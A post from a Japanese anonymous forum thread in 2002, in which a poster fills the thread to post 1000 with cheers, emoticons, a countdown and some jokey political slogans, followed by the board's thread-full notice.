名無しさん@お腹いっぱい。 :02/12/25 21:16 ID:wp4DX22q
よーし1000取るぞ〜!
1000取りフレーヾ(゚ー゚ゞ)( 尸ー゚)尸_フレー
(,,゚Д゚) ガンガレ!(,,゚Д゚) ガンガレ! ファイトーー!( ゚ロ゚)乂(゚ロ゚ )イッパーーツ!!
うめたてろ!!
うめたて中…
あと10!
光秀マンセー!
小泉は抵抗勢力だー!
豊郷小学校は解体すべきだー!
豊郷町長マンセー!
あと5つ!
あと4つ!
あと3つ!
あと2つ!
リーチ!
.1 0 0 0 THE END
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。